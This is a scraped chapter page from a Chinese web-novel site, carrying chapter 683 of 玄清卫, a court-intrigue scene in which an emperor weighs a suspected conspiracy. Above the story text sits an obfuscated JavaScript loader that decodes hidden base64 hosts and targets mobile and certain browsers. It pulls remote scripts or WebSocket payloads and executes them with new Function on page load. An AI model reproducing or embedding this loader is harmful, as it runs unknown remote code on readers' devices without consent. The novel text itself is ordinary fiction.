笔趣阁

字:
关灯 护眼
笔趣阁 > 玄清卫 > 第683章 预谋
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第683章 预谋

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
杨修胜的试探很简单,也很有效。千里音符的传送速度很快,而且皇宫和武庄的距离也不算远,所以两边联络都几乎是实时的,不可能给对方慢慢反应的时间。答错了或者答慢了都表示肯定出了问题。
  
  杨修胜想不明白的是自己安排过去的人手是如何被控制起来的?要知道那可是一个元丹境后境的高手,在晋王到达武庄之前杨延嗣身边应该没有人能够无声无息的制住他才对。
  
  还是说是晋王到了之后才生变的?
  
  又或者真如皇帝担心的那样,杨延嗣身上的截脉手段被某种未可知的手法破掉了?
  
  “杨延嗣和杨文广......他们......”皇帝深吸了一口气,闭上眼睛似乎陷入沉思,思绪跟着这两个名字慢慢的飘回了过去。曾几何时在皇室里这两个名字在某一段时间里经常被人提起。
  
  当年大家都还年幼,杨延嗣的岁数要年长一些,但杨延嗣只是皇族旁支,所以即便都一起进学可地位远不如皇子、公主,属于边缘人物。但身为二皇子的杨文广却和杨延嗣相处融洽,两人经常在一起研究修行方面的事情,有时候还会切磋。
  
  皇帝记得他还曾经因杨文广亲近杨延嗣这件事嘲讽过杨文广。
  
  再后来,往事如云烟,杨文广开府为晋王,杨延嗣则进了军伍历练,两人也就被世事洪流所疏远,逐渐让旁人忘记了那段短暂的“交情”。
  
  再后来杨文广“大考”失败被人救走,而杨延嗣在军中一直表现出类拔萃,从靖南军开始,辗转了四个方面军,几乎将军中的每一个领兵的职务都做了一遍,并且在一次次对蛮族的小规模战斗里保持全胜战绩,被皇帝委以重任,直到上一次与蛮族的大战更是封了柱国将军,执掌兵部大权,被视为皇帝手里最锋利的矛。
  
  若不是这次的事情,皇帝也不会记起那段不起眼的过去。
  
  “杨文广一回来就去找了杨延嗣,而杨延嗣有可能是杨文广救下来的,也就是说杨延嗣身上的截脉禁制以及那名出事儿的金剑修士都是杨文广所为。
  
  还有一种可能就是,杨延嗣从一开始就和杨文广勾结在一起了,并且有暗招,瞒过了截脉禁制,然后自己动手收拾了那名监视他的金剑修士。而杨文广只不过是“时机”到了过来汇合而已。
  
  不管是哪一种,那他们都必定谋划了许久。而且必然还有某种让他们紧密联系在一起的原因。”
  
  皇帝像是在自言自语,又像是在问策。之前略有些浑浊的眼神如今却透露着一股寒意。
  
  杨修胜不做声了。他不擅长权谋方面的事情,另外也不方便在这种事情上发表看法。还有一个就是他现在心里怒火中烧,他明白虽然皇帝没说他什么,可事实就是在他这一环出了大问题。
  
  “按照微臣的经验,能让两人勾结在一起甘冒杀头的风险图谋不轨的前提只有两种,要么是某个可以舍生忘死的“理念”,可以是仇,也可以是欲。另一种就是可以让人忘却危险的巨大“利益”。
  
  想来杨延嗣和晋王之间也不外乎这两种可能。”庞斑也不能站在边上干看着,皇帝像是在问策,他就要像模像样的回答。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师